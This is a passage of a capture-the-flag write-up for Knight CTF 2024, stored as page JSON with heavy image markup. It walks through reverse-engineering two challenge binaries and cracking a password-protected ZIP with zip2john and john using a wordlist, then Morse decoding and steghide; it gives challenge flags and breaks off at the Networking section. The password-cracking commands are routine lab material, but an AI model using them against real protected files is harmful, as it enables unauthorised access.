{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-knight-ctf-2024-en","result":{"data":{"markdownRemark":{"id":"7c27604f-ce39-5f49-be2d-4fd9c786bc93","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-knight-ctf-2024\">original page</a>.</p>\n</blockquote>\n<p>I participated in Knight CTF 2024 with 0nePadding.</p>\n<p>I couldn’t solve many challenges due to time constraints, but we finished in 68th place.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/905d18eafe9a992c387e0b95b82547af/6f278/image-20240123141643921.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 38.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAABZklEQVQY0xWQ23qkIBCEvdroKI1AcwZFBXXiTBKz7/9uy15VXdRfXV83ZGQDUJSy74euexCgfz5aSiljDAAkchQMOWMUrBScArJRjGCQVd+A0H7JwNA613a1AQZClNbPc89buo41eeUlUxy84kGJyaDDUcKAFaYqoJuZclJZjlpIXUoOIUqlvLPv537ltHjttRQUBKWrN5UPksuRNs7LGFyaQ9nm68wlL3tZ5zk4Z7a8bKudotvznNf5LMt1/A/UPOeMc978vEJlzjx9Pbe/3+fnvhxblDj2fW+tOjdStun3a79f5X4fP6/K+jRZNoI2unkQbkLwc2IotfPTlt/3vZbiYqRCDiCMc/nYX/cd0oLamBBjSiElLnXTE2CChylKiVrXAolKxehzTte116nrEn1w2lillbFVDYGK1FvYPLqWAlFY/z9wBhpZiiYFM3k9e72vcZ2s02gUt0rwkQDpu/aj69pq/gF8QS70ZRliLQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/905d18eafe9a992c387e0b95b82547af/8ac56/image-20240123141643921.webp 240w,\n/static/905d18eafe9a992c387e0b95b82547af/d3be9/image-20240123141643921.webp 480w,\n/static/905d18eafe9a992c387e0b95b82547af/e46b2/image-20240123141643921.webp 960w,\n/static/905d18eafe9a992c387e0b95b82547af/f992d/image-20240123141643921.webp 1440w,\n/static/905d18eafe9a992c387e0b95b82547af/a31b7/image-20240123141643921.webp 1488w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/905d18eafe9a992c387e0b95b82547af/8ff5a/image-20240123141643921.png 240w,\n/static/905d18eafe9a992c387e0b95b82547af/e85cb/image-20240123141643921.png 480w,\n/static/905d18eafe9a992c387e0b95b82547af/d9199/image-20240123141643921.png 960w,\n/static/905d18eafe9a992c387e0b95b82547af/07a9c/image-20240123141643921.png 1440w,\n/static/905d18eafe9a992c387e0b95b82547af/6f278/image-20240123141643921.png 1488w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/905d18eafe9a992c387e0b95b82547af/d9199/image-20240123141643921.png\"\n            alt=\"image-20240123141643921\"\n            title=\"image-20240123141643921\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It was an unusually forensics-heavy CTF, and I had a lot of fun participating.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#dragons-binaryrev\">Dragon’s Binary(Rev)</a></li>\n<li><a href=\"#knight-armouryrev\">Knight Armoury(Rev)</a></li>\n<li><a href=\"#flag-huntforensic\">Flag Hunt!(Forensic)</a></li>\n<li>\n<p><a href=\"#networking\">Networking</a></p>\n<ul>\n<li><a href=\"#vicker-ipforensic\">Vicker IP(Forensic)</a></li>\n<li><a href=\"#basic-enumforensic\">Basic Enum(Forensic)</a></li>\n<li><a href=\"#vulnerable-serviceforensic\">Vulnerable Service(Forensic)</a></li>\n<li><a href=\"#portforensic\">PORT(Forensic)</a></li>\n<li><a href=\"#cve-idforensic\">CVE ID(Forensic)</a></li>\n<li><a href=\"#famous-toolforensic\">Famous Tool(Forensic)</a></li>\n<li><a href=\"#hidden-fileforensic\">Hidden File(Forensic)</a></li>\n<li><a href=\"#confidentialforensic\">Confidential(Forensic)</a></li>\n<li><a href=\"#backdoorforensic\">BackDoor(Forensic)</a></li>\n<li><a href=\"#backdoor-pathforensic\">BackDoor Path(Forensic)</a></li>\n<li><a href=\"#super-adminforensic\">Super Admin(Forensic)</a></li>\n<li><a href=\"#admin-flagforensic\">Admin Flag(Forensic)</a></li>\n<li><a href=\"#vulnforensic\">Vuln(Forensic)</a></li>\n<li><a href=\"#famous-tool-2forensic\">Famous Tool 2(Forensic)</a></li>\n<li><a href=\"#something-interestingforensic\">Something Interesting(Forensic)</a></li>\n<li><a href=\"#hidden-pageforensic\">Hidden Page(Forensic)</a></li>\n<li><a href=\"#db-detailsforensic\">DB Details(Forensic)</a></li>\n<li><a href=\"#api-keyforensic\">API Key(Forensic)</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#digital-forensics\">Digital Forensics</a></p>\n<ul>\n<li><a href=\"#osforensic\">OS(Forensic)</a></li>\n<li><a href=\"#passwordforensic\">Password(Forensic)</a></li>\n<li><a href=\"#ip-addrforensic\">IP Addr(Forensic)</a></li>\n<li><a href=\"#noteforensic\">Note(Forensic)</a></li>\n<li><a href=\"#executionforensic\">Execution(Forensic)</a></li>\n<li><a href=\"#path-of-the-executableforensic\">Path of the Executable(Forensic)</a></li>\n<li><a href=\"#maliciousforensic\">Malicious(Forensic)</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"dragons-binaryrev\" style=\"position:relative;\"><a href=\"#dragons-binaryrev\" aria-label=\"dragons binaryrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Dragon’s Binary(Rev)</h2>\n<blockquote>\n<p>In the mystical land of Eldoria, a fierce dragon had captured the kingdom’s most precious treasure, hiding it behind a magical binary. The bravest knight of the realm, Sir Emeric, known for both sword and wit, embarked on a quest to retrieve the treasure. To succeed, he must reverse the dragon’s binary. As Sir Emeric’s trusted apprentice in “Dragon’s Binary” you are tasked with solving the cipher to reveal the hidden treasure and help vanquish the dragon’s spell. Your journey is filled with mystery and danger, where only the sharpest mind can prevail.</p>\n</blockquote>\n<p>When I analyzed the file provided as the challenge binary in Ghidra, I found that it validates a password read from standard input.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 557px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/83fa68b5bc0f5dcb63bf9b70b4a53225/30d00/image-20240121114105370.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 169.16666666666663%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAiCAYAAABfqvm9AAAACXBIWXMAAAsTAAALEwEAmpwYAAAEFElEQVRIx5VW2Y7jNhD0/39VkIccQB73KdhjbB22rFsiKZGUWKnm+Fx7PRMDhOXRsFhd3V3NTZIeUbULmt6haQKaGug6oO0WfjuEECCf8/dHn81+f4gP6+n/ZaPsff+WP15/fxKwQFF5ZEWPshmwrv6B0WfBIuDxWKFmeErVWJaJm1dc94ebkD8JWByPOFQLDuWAfqjQ99+gxgO8n/63fhEwzw8M1+F7OqFqemiVo+4LKD3caBpuNH19wCbP9hhUgDYG89zAOY1XfD5iu0mSFIZsjOkJNmNUC4bRkmHDQ46UIYGdFRrTQk/6DvQZOAFz7PPAcDWW4DERVJbzFrM36HUL62doa5i05a60gGeAuwxZCgJOWEF2c4/RjpiYlJUZnxceQEA1jxjNyCjcS5abLN2TIVC3E7TnJqtYiwI8wC4WbnFY1pXPc1yjHlkBy0PCzr83OzJME6CsDVywMG6KL5U9gZPlwgNmsvQsekU9lVa/TBZDzt8ZMuTAkC21k5eGIUvY720ZItO4VoeBSZTQ5bA1NsKV6Wa3TXFgOzcMeVoMmakYqjASAGElDG3Ucrowlnfyf6LrSkkuGr79SLDdAseKWQwuahdBTifPBNGsTQHx6/sBsuSdABpmXxkVQS8anhmeneX8kY1nJnNMio0Mz5otgdqy/w3LazAk4j0227cECZNSlNIhayyts8ByqpSQbPzZfc6/DNl3uoN19swwRR6TYgTizgelLkU7YSea3tXe6WCRQ0oprOFa2MeChd0a1HMdGUliGp46jmy1JQpBDf1DMYdT9m87KPaycyONocMkXcKOqHSN/bFGuq05Csan9fZzh1zqMGVVG1KuyhZDtyerFM2QolYVlFfsa3PSLDxl+NApb0xKngGHgqy6r2hVgpKe+K39it2Q0Xm6iz6fmS0xKcU+xPb7vqNzM9SiKrErC+TtHoUakI90c20uc+ClwWa0mpnJqEqFgs7d1itUD4bODFNXYzX0bE7dcB/iU8A3tknXjsx0g7b/gXLcQi90lNX8UviXIae0r2Ho6dicfhzyuz1ny1BTux6TnuDsxAhUNIjbRLzUcOhn1FXFUvkbWfkbG/4PdsBf6Kffaftfov9dh/6HSZGyATSXdV/oOH+yO/6Jy3g++38vdv+Z6RcBmzrwHsN54le2ktg++ExPdOwE/2z03V5ZcHcRYKckmCeawOiYzZFhssCnAe3Uo7cNWYt+M5eNQ0wM9moNj7eKzS7JMBHQOdqPbF48JfBoDgF9ZmB4FRuZLdV0vFVoJq6H1Su8tLkNjwzTVOqQV7iGBlFy1Wx2TyNlHVvWI40GbPW4BCQueTfQMOyJ403oUcNxWFkmdOTF37TXR+uMdD+dN9vtjiEzCcyEjM9n95nn62q0t8n5D3dhZLBzfUCcAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/83fa68b5bc0f5dcb63bf9b70b4a53225/8ac56/image-20240121114105370.webp 240w,\n/static/83fa68b5bc0f5dcb63bf9b70b4a53225/d3be9/image-20240121114105370.webp 480w,\n/static/83fa68b5bc0f5dcb63bf9b70b4a53225/9b7c7/image-20240121114105370.webp 557w\"\n              sizes=\"(max-width: 557px) 100vw, 557px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/83fa68b5bc0f5dcb63bf9b70b4a53225/8ff5a/image-20240121114105370.png 240w,\n/static/83fa68b5bc0f5dcb63bf9b70b4a53225/e85cb/image-20240121114105370.png 480w,\n/static/83fa68b5bc0f5dcb63bf9b70b4a53225/30d00/image-20240121114105370.png 557w\"\n            sizes=\"(max-width: 557px) 100vw, 557px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/83fa68b5bc0f5dcb63bf9b70b4a53225/30d00/image-20240121114105370.png\"\n            alt=\"image-20240121114105370\"\n            title=\"image-20240121114105370\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This check XORs the hard-coded string <code class=\"language-text\">letMeIn</code> with <code class=\"language-text\">IamDragon</code> and compares it against the XOR result of the input value.</p>\n<p>The correct flag was <code class=\"language-text\">KCTF{letMeIn}</code>.</p>\n<h2 id=\"knight-armouryrev\" style=\"position:relative;\"><a href=\"#knight-armouryrev\" aria-label=\"knight armouryrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Knight Armoury(Rev)</h2>\n<blockquote>\n<p>In a realm where magic and technology merge, lies the Knight Armoury, home to the legendary “Sword of Bytes.” Forged by Knight Squad, this digital sword holds immense power. Your mission: reverse the ancient binary guarding the Armoury and claim the sword to become the protector of the digital kingdom. Only the wisest and most skilled in reverse engineering can succeed. Are you ready to embark on this epic journey?</p>\n</blockquote>\n<p>When I analyzed the challenge binary in Ghidra, the password was immediately obvious.</p>\n<p>Sending it to the server yielded the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 604px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e1c9cb0a0ea883f52887a24080c2c5db/87254/image-20240121122032392.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 158.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAgCAYAAAASYli2AAAACXBIWXMAAAsTAAALEwEAmpwYAAADTElEQVRIx5VW13LaUBDVTFzAJXaKuwMGZKoaIAxCCExxo8UPmWQm//8fmz0rCUSSAfGwc/decY/Oni1CMQ5VspI5sg5U0vcz5JwZNCn3xceZmYTlAlMjq+/7v/FXmGIc8ibpb7TdO+qnHui3+74AkWcLy0VW3zcPlvcDwCVDg1m1vmj0rLpkJLKLH+GSb2pkXYLJugro064d5anJgK2vOjVOy8tQkmvsQP0PQ7BjRu1zkzpXVQYr0eO3BlWP7ld12gpwP0vNzxUBrR7eU+/WXur4l/DrTDGC+BFi97pO7oUpl5Ech0OvfyxsBSqASARYAQS+fVIi76ombO2TouzNxBYM21x72AAMSYGOD5/K1GAgMMR5NOsbAV1mAnYAwSG0xAodO5cWPfA+NqDJmfSYES4DEADwwQovAVuEHB+Qs9y9rkkCAAjdUDJIEs6cM11kiA1YPy1KQgACNmAGhu6FJQwlUQwcu2ymxpCGmRaNsg4noCgAb8WeAIPtTBvKWTgsNgI2OSSE1r2pCyDYgK3FUrTPDdF3mwJXtERG3v5y3xFmL3mPppU+PfGAmPAKXfW9u/iFPdEHPP8exaAdwntm8M5llQZ3LdGydpyPr2E/06T6cUFCdblkPM449ISG4mec7eqwtJOi8oeU6BcChGzBDkM3BIsVci/doDFrB1boWwAJQ2YMllYwjWKHjCyjO6AZBsKQdYNJl/A52G2VZfPIn4UYqgAAEMJGkWOUYYpjQKD4Q7b/WOSZ0k3Z1LuxJURcwmDAXAQTSADw14InTCs7aS6hjOiq7fnaYo/zym5aiCkjtS01ONMG9JRzpQ7hD9JN+Vh9N5/ExzN8XuGPS4+sc1vGHuSZGyOa8h1EpUy5DqeVgbQYwOb6UPavhS7N2EeCAAqwX85cfiOfCgaTjxr7nshjSRMoGncJOkGEjyQgnNAII0xGaOgsGPwwbOzhKy3uV6CDOjKN/sVQCA3/JKJgG7Ps3daFMkJDlpeAhmTZCT4PUVsHKsNB4wyF32DQXtReIrdSh3HqUdGTWbK57QDoW156Gw8hutRf4MM2MvzZnkvrvVef6Y0zC/+HPeaS6XB59KSkXoNzZBgvWAs4M0crbEKmGFnhfuEHbNcB/gGzlJH9a1fUdQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e1c9cb0a0ea883f52887a24080c2c5db/8ac56/image-20240121122032392.webp 240w,\n/static/e1c9cb0a0ea883f52887a24080c2c5db/d3be9/image-20240121122032392.webp 480w,\n/static/e1c9cb0a0ea883f52887a24080c2c5db/059a8/image-20240121122032392.webp 604w\"\n              sizes=\"(max-width: 604px) 100vw, 604px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e1c9cb0a0ea883f52887a24080c2c5db/8ff5a/image-20240121122032392.png 240w,\n/static/e1c9cb0a0ea883f52887a24080c2c5db/e85cb/image-20240121122032392.png 480w,\n/static/e1c9cb0a0ea883f52887a24080c2c5db/87254/image-20240121122032392.png 604w\"\n            sizes=\"(max-width: 604px) 100vw, 604px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e1c9cb0a0ea883f52887a24080c2c5db/87254/image-20240121122032392.png\"\n            alt=\"image-20240121122032392\"\n            title=\"image-20240121122032392\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"flag-huntforensic\" style=\"position:relative;\"><a href=\"#flag-huntforensic\" aria-label=\"flag huntforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Flag Hunt!(Forensic)</h2>\n<blockquote>\n<p>Hunt your way through the challenge and Capture The hidden Flag!!!</p>\n</blockquote>\n<p>By cracking the hash of the encrypted ZIP file provided for the challenge with <code class=\"language-text\">john</code>, I could identify the password needed to extract it.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">zip2john chall.zip <span class=\"token operator\">></span> hash.txt\n\n<span class=\"token comment\"># 辞書を使用して解析</span>\njohn --wordlist<span class=\"token operator\">=</span>/usr/share/wordlists/rockyou.txt hash.txt</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 878px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/94829/image-20240121124006712.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.416666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAsklEQVQY022PyQ6DMAxEubIKwqKyFAgQEkjK///dNLbKoVUPTy+WorEnkNuO87Se82ML5xzPy7KgqirUdQ0hBDvPcyRJ8pc4jhE4q7ErCa01jsPgehkfNOPRtui6joMICrodhiGiKOKAXwJ7zLCHxLYpGL3jcivsuUEpBSkl1nXlN11MS40xfDnR+qV936NpGnaWZQimacYwPPnDOI4oCuEpuB75vpCql2XJvqGaaZp++Q3q5Wdmw0d3kgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/8ac56/image-20240121124006712.webp 240w,\n/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/d3be9/image-20240121124006712.webp 480w,\n/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/6749f/image-20240121124006712.webp 878w\"\n              sizes=\"(max-width: 878px) 100vw, 878px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/8ff5a/image-20240121124006712.png 240w,\n/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/e85cb/image-20240121124006712.png 480w,\n/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/94829/image-20240121124006712.png 878w\"\n            sizes=\"(max-width: 878px) 100vw, 878px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/5a82b0c7fe72f3ab60ddf7907d6fe2f7/94829/image-20240121124006712.png\"\n            alt=\"image-20240121124006712\"\n            title=\"image-20240121124006712\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After extracting the files, I found a large number of image files and a file called <code class=\"language-text\">key.wav</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9b2992e99ae4abbe372e8b13ee2699ad/84ee5/image-20240121124113761.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABxklEQVQoz22OzU4aARSF5y3cEAEZa2MTu8DBtqIV0UJb/jtGUFINtIKiEECFwZkCwz+K2MaaNF111TeofYAubNJ3+jqw6MYubr6ck3vPuYJaanBd79H4cMGl1qSrX9FXaly0r+mWq1x2bgzWDH6ma/gDwz+vNOg3PzHQWnT0IVfVLrra42v3I0L4dQDvihM5GGZ9+SmbERn3ooOYvMnqM4ntjSiuMWNjbhm+2/mEqLH34vkiG8EQXtcyEV+Aly4nQiF3xtBoUE6b9NUmmtKho9SpqX3aBnXtnFZ5xJHWqZ31xrp61qVjfKopbXpqi1Kxxk37CuFtdJuoz0tiewfZu8beTpLQ+gr7iRRBo/HwfYbA6hLZvUP8riUKBzli/leGzhAPBcgkU+zKEVK7SRJyCOEgXUA/0cgdKVSyJ2QzJZSjY/LHJdS6TjweJ51O4/P7yRcKmEwmxGkRm82GTbT949TUFKIoIpTzJYrvEminKvtbUSrFCntymC/fvnP76w/DwQU/bn+Ow+7ufjMxMYHFYsFsNt+byUkzgkOSWFiQeDw3x8OZaR7NzjLzQGTN7UZ+E2F+XsJutyNJDjweD1ardXw8Cv3f/AUyqCKY0yLJgQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9b2992e99ae4abbe372e8b13ee2699ad/8ac56/image-20240121124113761.webp 240w,\n/static/9b2992e99ae4abbe372e8b13ee2699ad/d3be9/image-20240121124113761.webp 480w,\n/static/9b2992e99ae4abbe372e8b13ee2699ad/e46b2/image-20240121124113761.webp 960w,\n/static/9b2992e99ae4abbe372e8b13ee2699ad/ceabe/image-20240121124113761.webp 1076w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9b2992e99ae4abbe372e8b13ee2699ad/8ff5a/image-20240121124113761.png 240w,\n/static/9b2992e99ae4abbe372e8b13ee2699ad/e85cb/image-20240121124113761.png 480w,\n/static/9b2992e99ae4abbe372e8b13ee2699ad/d9199/image-20240121124113761.png 960w,\n/static/9b2992e99ae4abbe372e8b13ee2699ad/84ee5/image-20240121124113761.png 1076w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9b2992e99ae4abbe372e8b13ee2699ad/d9199/image-20240121124113761.png\"\n            alt=\"image-20240121124113761\"\n            title=\"image-20240121124113761\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Comparing the image files using md5 hashes shows that only one file has a different hash value.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 773px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/10eeee4ec8f253eb6ff96195578d32c3/612f7/image-20240121124442840.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 14.166666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAnklEQVQI1z1OywqEMBDzWq2iFA9a66uI1lutCwpr//+vsjtz8BCSTOaV+PBBOA445xBCwPHX27bBe4+u67CuK87zZE8ZgWp932OaJiilIIRAmqbIsgzJ83xx3zeu63pBPsaIcRyx7zsfoqXEy7KgKApIKZHnOeuyLFFVFetknmceHIaBQZpgrUVd12ia5s3oK/q6bVtmYwznWmv21P8DBz9UW20dYREAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/10eeee4ec8f253eb6ff96195578d32c3/8ac56/image-20240121124442840.webp 240w,\n/static/10eeee4ec8f253eb6ff96195578d32c3/d3be9/image-20240121124442840.webp 480w,\n/static/10eeee4ec8f253eb6ff96195578d32c3/c99d1/image-20240121124442840.webp 773w\"\n              sizes=\"(max-width: 773px) 100vw, 773px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/10eeee4ec8f253eb6ff96195578d32c3/8ff5a/image-20240121124442840.png 240w,\n/static/10eeee4ec8f253eb6ff96195578d32c3/e85cb/image-20240121124442840.png 480w,\n/static/10eeee4ec8f253eb6ff96195578d32c3/612f7/image-20240121124442840.png 773w\"\n            sizes=\"(max-width: 773px) 100vw, 773px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/10eeee4ec8f253eb6ff96195578d32c3/612f7/image-20240121124442840.png\"\n            alt=\"image-20240121124442840\"\n            title=\"image-20240121124442840\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Also, by feeding <code class=\"language-text\">key.wav</code> into an analysis tool and decoding the Morse code, I could identify the passphrase <code class=\"language-text\">morsecodetotherescue!!</code>.</p>\n<p>Reference: <a href=\"https://morsecode.world/international/decoder/audio-decoder-adaptive.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Morse Code Adaptive Audio Decoder | Morse Code World</a></p>\n<p>After that, using this passphrase to run <code class=\"language-text\">steghide extract</code> against <code class=\"language-text\">img725.jpg</code> gives the flag.</p>\n<h2 id=\"networking\" style=\"position:relative;\"><a href=\"#networking\" aria-label=\"networking permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 